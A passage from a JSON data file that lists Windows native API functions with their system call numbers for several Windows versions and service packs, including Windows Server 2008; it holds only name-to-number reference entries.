"250", "NtOpenSymbolicLinkObject": "251", "NtOpenThread": "252", "NtOpenTimer": "253", "NtOpenTransaction": "254", "NtOpenTransactionManager": "255", "NtPlugPlayControl": "256", "NtPrePrepareComplete": "257", "NtPrePrepareEnlistment": "258", "NtPrepareComplete": "259", "NtPrepareEnlistment": "260", "NtPrivilegeCheck": "261", "NtPrivilegeObjectAuditAlarm": "262", "NtPrivilegedServiceAuditAlarm": "263", "NtPropagationComplete": "264", "NtPropagationFailed": "265", "NtPullTransaction": "266", "NtPulseEvent": "267", "NtQueryBootEntryOrder": "268", "NtQueryBootOptions": "269", "NtQueryDebugFilterState": "270", "NtQueryDirectoryObject": "271", "NtQueryDriverEntryOrder": "272", "NtQueryEaFile": "273", "NtQueryFullAttributesFile": "274", "NtQueryInformationAtom": "275", "NtQueryInformationEnlistment": "276", "NtQueryInformationJobObject": "277", "NtQueryInformationPort": "278", "NtQueryInformationResourceManager": "279", "NtQueryInformationTransaction": "280", "NtQueryInformationTransactionManager": "281", "NtQueryInformationWorkerFactory": "282", "NtQueryInstallUILanguage": "283", "NtQueryIntervalProfile": "284", "NtQueryIoCompletion": "285", "NtQueryLicenseValue": "286", "NtQueryMultipleValueKey": "287", "NtQueryMutant": "288", "NtQueryOpenSubKeys": "289", "NtQueryOpenSubKeysEx": "290", "NtQueryPortInformationProcess": "291", "NtQueryQuotaInformationFile": "292", "NtQuerySecurityObject": "293", "NtQuerySemaphore": "294", "NtQuerySymbolicLinkObject": "295", "NtQuerySystemEnvironmentValue": "296", "NtQuerySystemEnvironmentValueEx": "297", "NtQueryTimerResolution": "298", "NtRaiseException": "299", "NtRaiseHardError": "300", "NtReadOnlyEnlistment": "301", "NtRecoverEnlistment": "302", "NtRecoverResourceManager": "303", "NtRecoverTransactionManager": "304", "NtRegisterProtocolAddressInformation": "305", "NtRegisterThreadTerminatePort": "306", "NtReleaseCMFViewOwnership": "307", "NtReleaseKeyedEvent": "308", "NtReleaseWorkerFactoryWorker": "309", "NtRemoveIoCompletionEx": "310", "NtRemoveProcessDebug": "311", "NtRenameKey": "312", "NtReplaceKey": "313", "NtReplyWaitReplyPort": "314", "NtRequestDeviceWakeup": "315", "NtRequestPort": "316", "NtRequestWakeupLatency": "317", "NtResetEvent": "318", "NtResetWriteWatch": "319", "NtRestoreKey": "320", "NtResumeProcess": "321", "NtRollbackComplete": "322", "NtRollbackEnlistment": "323", "NtRollbackSavepointTransaction": "324", "NtRollbackTransaction": "325", "NtRollforwardTransactionManager": "326", "NtSaveKey": "327", "NtSaveKeyEx": "328", "NtSaveMergedKeys": "329", "NtSavepointComplete": "330", "NtSavepointTransaction": "331", "NtSecureConnectPort": "332", "NtSetBootEntryOrder": "333", "NtSetBootOptions": "334", "NtSetContextThread": "335", "NtSetDebugFilterState": "336", "NtSetDefaultHardErrorPort": "337", "NtSetDefaultLocale": "338", "NtSetDefaultUILanguage": "339", "NtSetDriverEntryOrder": "340", "NtSetEaFile": "341", "NtSetHighEventPair": "342", "NtSetHighWaitLowEventPair": "343", "NtSetInformationDebugObject": "344", "NtSetInformationEnlistment": "345", "NtSetInformationJobObject": "346", "NtSetInformationKey": "347", "NtSetInformationResourceManager": "348", "NtSetInformationToken": "349", "NtSetInformationTransaction": "350", "NtSetInformationTransactionManager": "351", "NtSetInformationWorkerFactory": "352", "NtSetIntervalProfile": "353", "NtSetIoCompletion": "354", "NtSetLdtEntries": "355", "NtSetLowEventPair": "356", "NtSetLowWaitHighEventPair": "357", "NtSetQuotaInformationFile": "358", "NtSetSecurityObject": "359", "NtSetSystemEnvironmentValue": "360", "NtSetSystemEnvironmentValueEx": "361", "NtSetSystemInformation": "362", "NtSetSystemPowerState": "363", "NtSetSystemTime": "364", "NtSetThreadExecutionState": "365", "NtSetTimerResolution": "366", "NtSetUuidSeed": "367", "NtSetVolumeInformationFile": "368", "NtShutdownSystem": "369", "NtShutdownWorkerFactory": "370", "NtSignalAndWaitForSingleObject": "371", "NtSinglePhaseReject": "372", "NtStartProfile": "373", "NtStartTm": "374", "NtStopProfile": "375", "NtSuspendProcess": "376", "NtSuspendThread": "377", "NtSystemDebugControl": "378", "NtTerminateJobObject": "379", "NtTestAlert": "380", "NtThawRegistry": "381", "NtThawTransactions": "382", "NtTraceControl": "383", "NtTranslateFilePath": "384", "NtUnloadDriver": "385", "NtUnloadKey": "386", "NtUnloadKey2": "387", "NtUnloadKeyEx": "388", "NtUnlockFile": "389", "NtUnlockVirtualMemory": "390", "NtVdmControl": "391", "NtWaitForDebugEvent": "392", "NtWaitForKeyedEvent": "393", "NtWaitForWorkViaWorkerFactory": "394", "NtWaitHighEventPair": "395", "NtWaitLowEventPair": "396", "NtWorkerFactoryWorkerReady": "397"}, "SP1": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAcquireCMFViewOwnership": "102", "NtAddBootEntry": "103", "NtAddDriverEntry": "104", "NtAdjustGroupsToken": "105", "NtAlertResumeThread": "106", "NtAlertThread": "107", "NtAllocateLocallyUniqueId": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelDeviceWakeupRequest": "134", "NtCancelIoFileEx": "135", "NtCancelSynchronousIoFile": "136", "NtCommitComplete": "137", "NtCommitEnlistment": "138", "NtCommitTransaction": "139", "NtCompactKeys": "140", "NtCompareTokens": "141", "NtCompleteConnectPort": "142", "NtCompressKey": "143", "NtConnectPort": "144", "NtCreateDebugObject": "145", "NtCreateDirectoryObject": "146", "NtCreateEnlistment": "147", "NtCreateEventPair": "148", "NtCreateIoCompletion": "149", "NtCreateJobObject": "150", "NtCreateJobSet": "151", "NtCreateKeyTransacted": "152", "NtCreateKeyedEvent": "153", "NtCreateMailslotFile": "154", "NtCreateMutant": "155", "NtCreateNamedPipeFile": "156", "NtCreatePagingFile": "157", "NtCreatePort": "158", "NtCreatePrivateNamespace": "159", "NtCreateProcess": "160", "NtCreateProfile": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisplayString": "183", "NtEnumerateBootEntries": "184", "NtEnumerateDriverEntries": "185", "NtEnumerateSystemEnvironmentValuesEx": "186", "NtEnumerateTransactionObject": "187", "NtExtendSection": "188", "NtFilterToken": "189", "NtFlushInstallUILanguage": "190", "NtFlushInstructionCache": "191", "NtFlushKey": "192", "NtFlushProcessWriteBuffers": "193", "NtFlushVirtualMemory": "194", "NtFlushWriteBuffer": "195", "NtFreeUserPhysicalPages": "196", "NtFreezeRegistry": "197", "NtFreezeTransactions": "198", "NtGetContextThread": "199", "NtGetCurrentProcessorNumber": "200", "NtGetDevicePowerState": "201", "NtGetMUIRegistryInfo": "202", "NtGetNextProcess": "203", "NtGetNextThread": "204", "NtGetNlsSectionPtr": "205", "NtGetNotificationResourceManager": "206", "NtGetPlugPlayEvent": "207", "NtGetWriteWatch": "208", "NtImpersonateAnonymousToken": "209", "NtImpersonateThread": "210", "NtInitializeNlsFiles": "211", "NtInitializeRegistry": "212", "NtInitiatePowerAction": "213", "NtIsSystemResumeAutomatic": "214", "NtIsUILanguageComitted": "215", "NtListenPort": "216", "NtLoadDriver": "217", "NtLoadKey": "218", "NtLoadKey2": "219", "NtLoadKeyEx": "220", "NtLockFile": "221", "NtLockProductActivationKeys": "222", "NtLockRegistryKey": "223", "NtLockVirtualMemory": "224", "NtMakePermanentObject": "225", "NtMakeTemporaryObject": "226", "NtMapCMFModule": "227", "NtMapUserPhysicalPages": "228", "NtModifyBootEntry": "229", "NtModifyDriverEntry": "230", "NtNotifyChangeDirectoryFile": "231", "NtNotifyChangeKey": "232", "NtNotifyChangeMultipleKeys": "233", "NtOpenEnlistment": "234", "NtOpenEventPair": "235", "NtOpenIoCompletion": "236", "NtOpenJobObject": "237", "NtOpenKeyTransacted": "238", "NtOpenKeyedEvent": "239", "NtOpenMutant": "240", "NtOpenObjectAuditAlarm": "241", "NtOpenPrivateNamespace": "242", "NtOpenProcessToken": "243", "NtOpenResourceManager": "244", "NtOpenSemaphore": "245", "NtOpenSession": "246", "NtOpenSymbolicLinkObject": "247", "NtOpenThread": "248", "NtOpenTimer": "249", "NtOpenTransaction": "250", "NtOpenTransactionManager": "251", "NtPlugPlayControl": "252", "NtPrePrepareComplete": "253", "NtPrePrepareEnlistment": "254", "NtPrepareComplete": "255", "NtPrepareEnlistment": "256", "NtPrivilegeCheck": "257", "NtPrivilegeObjectAuditAlarm": "258", "NtPrivilegedServiceAuditAlarm": "259", "NtPropagationComplete": "260", "NtPropagationFailed": "261", "NtPulseEvent": "262", "NtQueryBootEntryOrder": "263", "NtQueryBootOptions": "264", "NtQueryDebugFilterState": "265", "NtQueryDirectoryObject": "266", "NtQueryDriverEntryOrder": "267", "NtQueryEaFile": "268", "NtQueryFullAttributesFile": "269", "NtQueryInformationAtom": "270", "NtQueryInformationEnlistment": "271", "NtQueryInformationJobObject": "272", "NtQueryInformationPort": "273", "NtQueryInformationResourceManager": "274", "NtQueryInformationTransaction": "275", "NtQueryInformationTransactionManager": "276", "NtQueryInformationWorkerFactory": "277", "NtQueryInstallUILanguage": "278", "NtQueryIntervalProfile": "279", "NtQueryIoCompletion": "280", "NtQueryLicenseValue": "281", "NtQueryMultipleValueKey": "282", "NtQueryMutant": "283", "NtQueryOpenSubKeys": "284", "NtQueryOpenSubKeysEx": "285", "NtQueryPortInformationProcess": "286", "NtQueryQuotaInformationFile": "287", "NtQuerySecurityObject": "288", "NtQuerySemaphore": "289", "NtQuerySymbolicLinkObject": "290", "NtQuerySystemEnvironmentValue": "291", "NtQuerySystemEnvironmentValueEx": "292", "NtQueryTimerResolution": "293", "NtRaiseException": "294", "NtRaiseHardError": "295", "NtReadOnlyEnlistment": "296", "NtRecoverEnlistment": "297", "NtRecoverResourceManager": "298", "NtRecoverTransactionManager": "299", "NtRegisterProtocolAddressInformation": "300", "NtRegisterThreadTerminatePort": "301", "NtReleaseCMFViewOwnership": "302", "NtReleaseKeyedEvent": "303", "NtReleaseWorkerFactoryWorker": "304", "NtRemoveIoCompletionEx": "305", "NtRemoveProcessDebug": "306", "NtRenameKey": "307", "NtRenameTransactionManager": "308", "NtReplaceKey": "309", "NtReplacePartitionUnit": "310", "NtReplyWaitReplyPort": "311", "NtRequestDeviceWakeup": "312", "NtRequestPort": "313", "NtRequestWakeupLatency": "314", "NtResetEvent": "315", "NtResetWriteWatch": "316", "NtRestoreKey": "317", "NtResumeProcess": "318", "NtRollbackComplete": "319", "NtRollbackEnlistment": "320", "NtRollbackTransaction": "321", "NtRollforwardTransactionManager": "322", "NtSaveKey": "323", "NtSaveKeyEx": "324", "NtSaveMergedKeys": "325", "NtSecureConnectPort": "326", "NtSetBootEntryOrder": "327", "NtSetBootOptions": "328", "NtSetContextThread": "329", "NtSetDebugFilterState": "330", "NtSetDefaultHardErrorPort": "331", "NtSetDefaultLocale": "332", "NtSetDefaultUILanguage": "333", "NtSetDriverEntryOrder": "334", "NtSetEaFile": "335", "NtSetHighEventPair": "336", "NtSetHighWaitLowEventPair": "337", "NtSetInformationDebugObject": "338", "NtSetInformationEnlistment": "339", "NtSetInformationJobObject": "340", "NtSetInformationKey": "341", "NtSetInformationResourceManager": "342", "NtSetInformationToken": "343", "NtSetInformationTransaction": "344", "NtSetInformationTransactionManager": "345", "NtSetInformationWorkerFactory": "346", "NtSetIntervalProfile": "347", "NtSetIoCompletion": "348", "NtSetLdtEntries": "349", "NtSetLowEventPair": "350", "NtSetLowWaitHighEventPair": "351", "NtSetQuotaInformationFile": "352", "NtSetSecurityObject": "353", "NtSetSystemEnvironmentValue": "354", "NtSetSystemEnvironmentValueEx": "355", "NtSetSystemInformation": "356", "NtSetSystemPowerState": "357", "NtSetSystemTime": "358", "NtSetThreadExecutionState": "359", "NtSetTimerResolution": "360", "NtSetUuidSeed": "361", "NtSetVolumeInformationFile": "362", "NtShutdownSystem": "363", "NtShutdownWorkerFactory": "364", "NtSignalAndWaitForSingleObject": "365", "NtSinglePhaseReject": "366", "NtStartProfile": "367", "NtStopProfile": "368", "NtSuspendProcess": "369", "NtSuspendThread": "370", "NtSystemDebugControl": "371", "NtTerminateJobObject": "372", "NtTestAlert": "373", "NtThawRegistry": "374", "NtThawTransactions": "375", "NtTraceControl": "376", "NtTranslateFilePath": "377", "NtUnloadDriver": "378", "NtUnloadKey": "379", "NtUnloadKey2": "380", "NtUnloadKeyEx": "381", "NtUnlockFile": "382", "NtUnlockVirtualMemory": "383", "NtVdmControl": "384", "NtWaitForDebugEvent": "385", "NtWaitForKeyedEvent": "386", "NtWaitForWorkViaWorkerFactory": "387", "NtWaitHighEventPair": "388", "NtWaitLowEventPair": "389", "NtWorkerFactoryWorkerReady": "390"}, "SP2": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", "NtDeviceIoControlFile": "4", "NtWriteFile": "5", "NtRemoveIoCompletion": "6", "NtReleaseSemaphore": "7", "NtReplyWaitReceivePort": "8", "NtReplyPort": "9", "NtSetInformationThread": "10", "NtSetEvent": "11", "NtClose": "12", "NtQueryObject": "13", "NtQueryInformationFile": "14", "NtOpenKey": "15", "NtEnumerateValueKey": "16", "NtFindAtom": "17", "NtQueryDefaultLocale": "18", "NtQueryKey": "19", "NtQueryValueKey": "20", "NtAllocateVirtualMemory": "21", "NtQueryInformationProcess": "22", "NtWaitForMultipleObjects32": "23", "NtWriteFileGather": "24", "NtSetInformationProcess": "25", "NtCreateKey": "26", "NtFreeVirtualMemory": "27", "NtImpersonateClientOfPort": "28", "NtReleaseMutant": "29", "NtQueryInformationToken": "30", "NtRequestWaitReplyPort": "31", "NtQueryVirtualMemory": "32", "NtOpenThreadToken": "33", "NtQueryInformationThread": "34", "NtOpenProcess": "35", "NtSetInformationFile": "36", "NtMapViewOfSection": "37", "NtAccessCheckAndAuditAlarm": "38", "NtUnmapViewOfSection": "39", "NtReplyWaitReceivePortEx": "40", "NtTerminateProcess": "41", "NtSetEventBoostPriority": "42", "NtReadFileScatter": "43", "NtOpenThreadTokenEx": "44", "NtOpenProcessTokenEx": "45", "NtQueryPerformanceCounter": "46", "NtEnumerateKey": "47", "NtOpenFile": "48", "NtDelayExecution": "49", "NtQueryDirectoryFile": "50", "NtQuerySystemInformation": "51", "NtOpenSection": "52", "NtQueryTimer": "53", "NtFsControlFile": "54", "NtWriteVirtualMemory": "55", "NtCloseObjectAuditAlarm": "56", "NtDuplicateObject": "57", "NtQueryAttributesFile": "58", "NtClearEvent": "59", "NtReadVirtualMemory": "60", "NtOpenEvent": "61", "NtAdjustPrivilegesToken": "62", "NtDuplicateToken": "63", "NtContinue": "64", "NtQueryDefaultUILanguage": "65", "NtQueueApcThread": "66", "NtYieldExecution": "67", "NtAddAtom": "68", "NtCreateEvent": "69", "NtQueryVolumeInformationFile": "70", "NtCreateSection": "71", "NtFlushBuffersFile": "72", "NtApphelpCacheControl": "73", "NtCreateProcessEx": "74", "NtCreateThread": "75", "NtIsProcessInJob": "76", "NtProtectVirtualMemory": "77", "NtQuerySection": "78", "NtResumeThread": "79", "NtTerminateThread": "80", "NtReadRequestData": "81", "NtCreateFile": "82", "NtQueryEvent": "83", "NtWriteRequestData": "84", "NtOpenDirectoryObject": "85", "NtAccessCheckByTypeAndAuditAlarm": "86", "NtQuerySystemTime": "87", "NtWaitForMultipleObjects": "88", "NtSetInformationObject": "89", "NtCancelIoFile": "90", "NtTraceEvent": "91", "NtPowerInformation": "92", "NtSetValueKey": "93", "NtCancelTimer": "94", "NtSetTimer": "95", "NtAcceptConnectPort": "96", "NtAccessCheck": "97", "NtAccessCheckByType": "98", "NtAccessCheckByTypeResultList": "99", "NtAccessCheckByTypeResultListAndAuditAlarm": "100", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "101", "NtAcquireCMFViewOwnership": "102", "NtAddBootEntry": "103", "NtAddDriverEntry": "104", "NtAdjustGroupsToken": "105", "NtAlertResumeThread": "106", "NtAlertThread": "107", "NtAllocateLocallyUniqueId": "108", "NtAllocateUserPhysicalPages": "109", "NtAllocateUuids": "110", "NtAlpcAcceptConnectPort": "111", "NtAlpcCancelMessage": "112", "NtAlpcConnectPort": "113", "NtAlpcCreatePort": "114", "NtAlpcCreatePortSection": "115", "NtAlpcCreateResourceReserve": "116", "NtAlpcCreateSectionView": "117", "NtAlpcCreateSecurityContext": "118", "NtAlpcDeletePortSection": "119", "NtAlpcDeleteResourceReserve": "120", "NtAlpcDeleteSectionView": "121", "NtAlpcDeleteSecurityContext": "122", "NtAlpcDisconnectPort": "123", "NtAlpcImpersonateClientOfPort": "124", "NtAlpcOpenSenderProcess": "125", "NtAlpcOpenSenderThread": "126", "NtAlpcQueryInformation": "127", "NtAlpcQueryInformationMessage": "128", "NtAlpcRevokeSecurityContext": "129", "NtAlpcSendWaitReceivePort": "130", "NtAlpcSetInformation": "131", "NtAreMappedFilesTheSame": "132", "NtAssignProcessToJobObject": "133", "NtCancelDeviceWakeupRequest": "134", "NtCancelIoFileEx": "135", "NtCancelSynchronousIoFile": "136", "NtCommitComplete": "137", "NtCommitEnlistment": "138", "NtCommitTransaction": "139", "NtCompactKeys": "140", "NtCompareTokens": "141", "NtCompleteConnectPort": "142", "NtCompressKey": "143", "NtConnectPort": "144", "NtCreateDebugObject": "145", "NtCreateDirectoryObject": "146", "NtCreateEnlistment": "147", "NtCreateEventPair": "148", "NtCreateIoCompletion": "149", "NtCreateJobObject": "150", "NtCreateJobSet": "151", "NtCreateKeyTransacted": "152", "NtCreateKeyedEvent": "153", "NtCreateMailslotFile": "154", "NtCreateMutant": "155", "NtCreateNamedPipeFile": "156", "NtCreatePagingFile": "157", "NtCreatePort": "158", "NtCreatePrivateNamespace": "159", "NtCreateProcess": "160", "NtCreateProfile": "161", "NtCreateResourceManager": "162", "NtCreateSemaphore": "163", "NtCreateSymbolicLinkObject": "164", "NtCreateThreadEx": "165", "NtCreateTimer": "166", "NtCreateToken": "167", "NtCreateTransaction": "168", "NtCreateTransactionManager": "169", "NtCreateUserProcess": "170", "NtCreateWaitablePort": "171", "NtCreateWorkerFactory": "172", "NtDebugActiveProcess": "173", "NtDebugContinue": "174", "NtDeleteAtom": "175", "NtDeleteBootEntry": "176", "NtDeleteDriverEntry": "177", "NtDeleteFile": "178", "NtDeleteKey": "179", "NtDeleteObjectAuditAlarm": "180", "NtDeletePrivateNamespace": "181", "NtDeleteValueKey": "182", "NtDisplayString": "183", "NtEnumerateBootEntries": "184", "NtEnumerateDriverEntries": "185", "NtEnumerateSystemEnvironmentValuesEx": "186", "NtEnumerateTransactionObject": "187", "NtExtendSection": "188", "NtFilterToken": "189", "NtFlushInstallUILanguage": "190", "NtFlushInstructionCache": "191", "NtFlushKey": "192", "NtFlushProcessWriteBuffers": "193", "NtFlushVirtualMemory": "194", "NtFlushWriteBuffer": "195", "NtFreeUserPhysicalPages": "196", "NtFreezeRegistry": "197", "NtFreezeTransactions": "198", "NtGetContextThread": "199", "NtGetCurrentProcessorNumber": "200", "NtGetDevicePowerState": "201", "NtGetMUIRegistryInfo": "202", "NtGetNextProcess": "203", "NtGetNextThread": "204", "NtGetNlsSectionPtr": "205", "NtGetNotificationResourceManager": "206", "NtGetPlugPlayEvent": "207", "NtGetWriteWatch": "208", "NtImpersonateAnonymousToken": "209", "NtImpersonateThread": "210", "NtInitializeNlsFiles": "211", "NtInitializeRegistry": "212", "NtInitiatePowerAction": "213", "NtIsSystemResumeAutomatic": "214", "NtIsUILanguageComitted": "215", "NtListenPort": "216", "NtLoadDriver": "217", "NtLoadKey": "218", "NtLoadKey2": "219", "NtLoadKeyEx": "220", "NtLockFile": "221", "NtLockProductActivationKeys": "222", "NtLockRegistryKey": "223", "NtLockVirtualMemory": "224", "NtMakePermanentObject": "225", "NtMakeTemporaryObject": "226", "NtMapCMFModule": "227", "NtMapUserPhysicalPages": "228", "NtModifyBootEntry": "229", "NtModifyDriverEntry": "230", "NtNotifyChangeDirectoryFile": "231", "NtNotifyChangeKey": "232", "NtNotifyChangeMultipleKeys": "233", "NtOpenEnlistment": "234", "NtOpenEventPair": "235", "NtOpenIoCompletion": "236", "NtOpenJobObject": "237", "NtOpenKeyTransacted": "238", "NtOpenKeyedEvent": "239", "NtOpenMutant": "240", "NtOpenObjectAuditAlarm": "241", "NtOpenPrivateNamespace": "242", "NtOpenProcessToken": "243", "NtOpenResourceManager": "244", "NtOpenSemaphore": "245", "NtOpenSession": "246", "NtOpenSymbolicLinkObject": "247", "NtOpenThread": "248", "NtOpenTimer": "249", "NtOpenTransaction": "250", "NtOpenTransactionManager": "251", "NtPlugPlayControl": "252", "NtPrePrepareComplete": "253", "NtPrePrepareEnlistment": "254", "NtPrepareComplete": "255", "NtPrepareEnlistment": "256", "NtPrivilegeCheck": "257", "NtPrivilegeObjectAuditAlarm": "258", "NtPrivilegedServiceAuditAlarm": "259", "NtPropagationComplete": "260", "NtPropagationFailed": "261", "NtPulseEvent": "262", "NtQueryBootEntryOrder": "263", "NtQueryBootOptions": "264", "NtQueryDebugFilterState": "265", "NtQueryDirectoryObject": "266", "NtQueryDriverEntryOrder": "267", "NtQueryEaFile": "268", "NtQueryFullAttributesFile": "269", "NtQueryInformationAtom": "270", "NtQueryInformationEnlistment": "271", "NtQueryInformationJobObject": "272", "NtQueryInformationPort": "273", "NtQueryInformationResourceManager": "274", "NtQueryInformationTransaction": "275", "NtQueryInformationTransactionManager": "276", "NtQueryInformationWorkerFactory": "277", "NtQueryInstallUILanguage": "278", "NtQueryIntervalProfile": "279", "NtQueryIoCompletion": "280", "NtQueryLicenseValue": "281", "NtQueryMultipleValueKey": "282", "NtQueryMutant": "283", "NtQueryOpenSubKeys": "284", "NtQueryOpenSubKeysEx": "285", "NtQueryPortInformationProcess": "286", "NtQueryQuotaInformationFile": "287", "NtQuerySecurityObject": "288", "NtQuerySemaphore": "289", "NtQuerySymbolicLinkObject": "290", "NtQuerySystemEnvironmentValue": "291", "NtQuerySystemEnvironmentValueEx": "292", "NtQueryTimerResolution": "293", "NtRaiseException": "294", "NtRaiseHardError": "295", "NtReadOnlyEnlistment": "296", "NtRecoverEnlistment": "297", "NtRecoverResourceManager": "298", "NtRecoverTransactionManager": "299", "NtRegisterProtocolAddressInformation": "300", "NtRegisterThreadTerminatePort": "301", "NtReleaseCMFViewOwnership": "302", "NtReleaseKeyedEvent": "303", "NtReleaseWorkerFactoryWorker": "304", "NtRemoveIoCompletionEx": "305", "NtRemoveProcessDebug": "306", "NtRenameKey": "307", "NtRenameTransactionManager": "308", "NtReplaceKey": "309", "NtReplacePartitionUnit": "310", "NtReplyWaitReplyPort": "311", "NtRequestDeviceWakeup": "312", "NtRequestPort": "313", "NtRequestWakeupLatency": "314", "NtResetEvent": "315", "NtResetWriteWatch": "316", "NtRestoreKey": "317", "NtResumeProcess": "318", "NtRollbackComplete": "319", "NtRollbackEnlistment": "320", "NtRollbackTransaction": "321", "NtRollforwardTransactionManager": "322", "NtSaveKey": "323", "NtSaveKeyEx": "324", "NtSaveMergedKeys": "325", "NtSecureConnectPort": "326", "NtSetBootEntryOrder": "327", "NtSetBootOptions": "328", "NtSetContextThread": "329", "NtSetDebugFilterState": "330", "NtSetDefaultHardErrorPort": "331", "NtSetDefaultLocale": "332", "NtSetDefaultUILanguage": "333", "NtSetDriverEntryOrder": "334", "NtSetEaFile": "335", "NtSetHighEventPair": "336", "NtSetHighWaitLowEventPair": "337", "NtSetInformationDebugObject": "338", "NtSetInformationEnlistment": "339", "NtSetInformationJobObject": "340", "NtSetInformationKey": "341", "NtSetInformationResourceManager": "342", "NtSetInformationToken": "343", "NtSetInformationTransaction": "344", "NtSetInformationTransactionManager": "345", "NtSetInformationWorkerFactory": "346", "NtSetIntervalProfile": "347", "NtSetIoCompletion": "348", "NtSetLdtEntries": "349", "NtSetLowEventPair": "350", "NtSetLowWaitHighEventPair": "351", "NtSetQuotaInformationFile": "352", "NtSetSecurityObject": "353", "NtSetSystemEnvironmentValue": "354", "NtSetSystemEnvironmentValueEx": "355", "NtSetSystemInformation": "356", "NtSetSystemPowerState": "357", "NtSetSystemTime": "358", "NtSetThreadExecutionState": "359", "NtSetTimerResolution": "360", "NtSetUuidSeed": "361", "NtSetVolumeInformationFile": "362", "NtShutdownSystem": "363", "NtShutdownWorkerFactory": "364", "NtSignalAndWaitForSingleObject": "365", "NtSinglePhaseReject": "366", "NtStartProfile": "367", "NtStopProfile": "368", "NtSuspendProcess": "369", "NtSuspendThread": "370", "NtSystemDebugControl": "371", "NtTerminateJobObject": "372", "NtTestAlert": "373", "NtThawRegistry": "374", "NtThawTransactions": "375", "NtTraceControl": "376", "NtTranslateFilePath": "377", "NtUnloadDriver": "378", "NtUnloadKey": "379", "NtUnloadKey2": "380", "NtUnloadKeyEx": "381", "NtUnlockFile": "382", "NtUnlockVirtualMemory": "383", "NtVdmControl": "384", "NtWaitForDebugEvent": "385", "NtWaitForKeyedEvent": "386", "NtWaitForWorkViaWorkerFactory": "387", "NtWaitHighEventPair": "388", "NtWaitLowEventPair": "389", "NtWorkerFactoryWorkerReady": "390"}}, "Windows Server 2008": {"SP0": {"NtMapUserPhysicalPagesScatter": "0", "NtWaitForSingleObject": "1", "NtCallbackReturn": "2", "NtReadFile": "3", 